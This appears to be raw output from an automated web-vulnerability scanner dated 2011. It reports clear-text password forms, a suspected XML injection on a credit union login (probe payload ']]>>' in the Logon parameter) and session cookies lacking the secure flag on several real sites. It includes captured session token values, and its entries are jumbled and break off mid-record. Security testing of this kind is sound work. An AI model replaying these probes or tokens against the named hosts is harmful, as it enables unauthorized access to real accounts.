GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1 Host: www.enewspf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/ Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69019
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:20:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The Logon parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the Logon parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.
Request
GET /cgi-bin/ifsewwwc?Logon]]>> HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/profile HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:29 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aU0Uk5nb5BA_Am808J14jE7JicB888mFkpQFBOHW4JYjU67MKveNZkehKvObze9qKFzCmSjrSPuMVPowkxO7gkmwcbxJO5vw5voNOGNMwvOb%7EUJbx6tCSy_bCnSrKzQGVdPcombRzPLEb9g0nCkkD_%7EWJwqKHVA%7EW0; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile RNT-Time: D=102168 t=1296691469895303 RNT-Machine: 03 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:27 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUUNxzJjI%7EEBBcQah8ZuwLUiAJYt0CDud3iF0cvFeI9vUWGePzobuVG_g26Zd6hlHghKzIa6jlESqhi9bh9eUCYd1RS2Olmn8B0SSTRuJV7Ab11fy1nnjbaf605DUDPlrkyJmQs5j2lPWqGZGdDIhTPsS399%7E9JSX3; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile RNT-Time: D=130796 t=1296691467555198 RNT-Machine: 02 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/questions/list HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:24 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUCQuHT%7ERTFnFfe9AXmXRmwPEpTRddWqH%7EauwR6NFwF6Mv19DYjRyhdQ5pDpU347NzekN_qOS6_OSJPu7dwUlwam9Nw2lC2NuUqwf8H%7E7KefSYEeS8SWsrSWFhsYOMj11Q2CuTQDql8q8XVjY77HyXUGPh%7ErJ9dsJY; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist RNT-Time: D=110262 t=1296691464482053 RNT-Machine: 01 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:22 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUB%7ESjbLwJtIVsNpyw2yYnPiUVp9oatiKCB5e7w4_RWj6PX1MfyBMOQZZV2qvNWwFEb02ybhpf2AczDWcrpXyZh6g8_UqfalUo6SU5z4X78ODb7yf3m7dPKXBUt5vEse2QyYfsLtvbjJTwqYnE8k2JplQ7KAfAkNfT; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist RNT-Time: D=105998 t=1296691462944248 RNT-Machine: 02 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/docs HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:08 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUuAdP_4HjJaEE4b%7E7X4pORI8c8XeBMU6w1fivQgVK50XUIlnW6xgpSoTaD9T5Sa2vcbft3fkW9vUAHOODRPrmi1d_oUeFuF8d215NaHAEJ9KJKI7zOAM4wuNlEtYix3x2z8D4fynI8hhabhhtifNK10gaE7AmfFA0; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs RNT-Time: D=98256 t=1296691448735268 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:01 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUpsd4YvJ5WQzq15S7q5tqkwfZH5ARFTzifu9H7kUEy7J2l05kN1pvoqfUmrLHTD8Xeni3Q88n9EmcZ2e_tFs_3LPC25pvIgiKBzgjpIDGf34_jh6r%7EZakRAXln5kOiRl1TXEdmhsfK7Usex_dWYzDVQosUABjHDNp; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs RNT-Time: D=105949 t=1296691441126003 RNT-Machine: 04 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/list HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:03 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUAlcQ2aPfIhdh2rnPJX1dNfzNT3Zj79Cv2ZjySVBKD7IBypHcc7qe2jlZAZvpnBgm6kcgv6j1nUR3NKxMrwSp8yNVTcVuO4InnJaTwq3JaCL_xNNSeYru_O64XonEYrdXjQqw_z9qC_Dk0u6IybsFxfQY1k20J_pC; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist RNT-Time: D=107230 t=1296691443459774 RNT-Machine: 03 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:03:56 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUGhL18AeEaT6Z%7EDIuvJlBq0A9oVLf5YqKK5hDthKUl1P4RVzd63RzFCyjego6VqN1FgEm2%7Ej8LURXaTIf2gcB429lSwFnCSqGYvqwy4bUILnbHKw5Lh0OGHmZb6CflO0vrO3UwFGQqctz82dTg_YGC7NQ67Y44S6k; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist RNT-Time: D=125101 t=1296691436633614 RNT-Machine: 08 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/home HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:24 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUPRnPaTZdkIhBi59G5hvxncx_kJa2b_xWToVCDbB35oFkkjhOfFooBkvU99%7EWw%7ELvUGgTe738XUujxie0uHpb9BuUEUDYMNp1Oh_dJo6Jx%7EIpWz_rHWApAwgIlsVp76eHy6TjF1PoyG%7EnGXSIaeapXcDHDERK56hz; path=/; httponly RNT-Time: D=190304 t=1296689784733053 RNT-Machine: 01 F5_do_compression: yes Keep-Alive: timeout=15, max=40 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 22922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/ipreaddress HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:36 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aU4YiZt0HzA%7EV3KX5r1TJz3XkyVV7spmoCXP7Bl0HtJNRb80KnaJwwhvnKgvOLI6sksa%7EMj9Lhj6UyT6M1EJJc2nff5tBBrJ5C6Oc2gE3XdFdL1aLgf6lLTXnUah%7EuEsyspXOwDB8mzueTf1nIZTtYmCgWIgJHyra_; path=/; httponly Content-Length: 26531 RNT-Time: D=98619 t=1296691416912311 RNT-Machine: 02 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/utils/account_assistance HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:34 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUSf2lTIfZqUhFbsYQsfqk1hHQmNSnWOiMBpzvtqNtH0tK4CI%7EMeW5n_sslngXWMTm1Y09v7ffr8O9l22cVoIBTZHYNX4H_%7Ef3qan5VXGN6_KDNksCFME8_z6dv0lDtf04f6pgA_0%7ENHbiF2pDNKQ9my8hufrUSvYV; path=/; httponly Content-Length: 25523 RNT-Time: D=109651 t=1296691414433832 RNT-Machine: 04 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:36:54 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUxZnUaDGKWGCoJxP2PirvbbIbzUmIrOERHuiwMPolSaNNQ5cWSBy7b95CCTf%7EtuSCpEBZuXUf7%7EtZPVBrPWpNM7rZHcHCqYnykCjhuJL6fvRIYGe3FpYdQkPM8zrOx5T%7Ec%7Eyr1AYLOtosuf4nU%7EMDUq4y6NqCDoHVlbbaOMInEeRIoePUHloWEbXDshncJ5Z5UWIFbjYOkwE1a_LL0sskmWSkMGutyuilas3jpD8oRmb5BPZakyLOKcySGE_k9p_cRDJ0vpesyV5h3GuToJLqQxr4nRTno7kQzoIVZAvdgfBVYLOBxBWRHz0Pjg0IAxWQWY7y6A%7E5Nb9hainTy3e1DV77bhCz0K%7ExhamkwiceXoBM3BLlAxLVEPseGop_RZXNOP5iHV1RdgkXdSyqrVfB6RNvS4eSZqNF; path=/; httponly RNT-Time: D=123349 t=1296697014631679 RNT-Machine: 03 F5_do_compression: yes Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25309
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:16 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUnG2PM4YlBhARYlemP7Ir7vz_HhKbRP1YLO_iG8sts9DErmpH9oGUWz38ezqOfO6jPPRQothRreGexHLaBcRhH0G6Ip_3g4zPqEOieO2lme9gAmVdWybrtlST1NfjSZpraqJxAqdCUwY2R1aNvTp%7ESnP1RWgZhqb9; path=/; httponly Content-Length: 25572 RNT-Time: D=150572 t=1296691396102170 RNT-Machine: 02 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/webinar HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:05:02 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUxcTSvKQj23TDHZUibRNCb%7E5279X_vQOXrRk9Wlz5gi554VWz%7ElROaR0B_aepenyHaj%7EszXAG5NPbVDw7bozgYfhj%7EONI%7ElkHrzLkTSZqwxKBGsjnnYZ9bSgcgVw3_cL9sWOKmlbZOnY849hkMltAEDoEEHuQ4_1t; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar RNT-Time: D=168719 t=1296691502763223 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:47 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUGR7btxDd%7EjlgKRgeiuzFM8p6eU1yRBCBQqdEPwIv_mBJb0QQTkulO2GBOGO8_N3eWzNq_zhrCzbCwS1_2InE_sjrMT_CzzQ4bcd3L%7EVGKEV%7EsWtrcf8hb492HLMcyosrWfnnlKLB3MHiSs0Q4K2kIHOUKE6UBlYK; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar RNT-Time: D=216440 t=1296691487850159 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
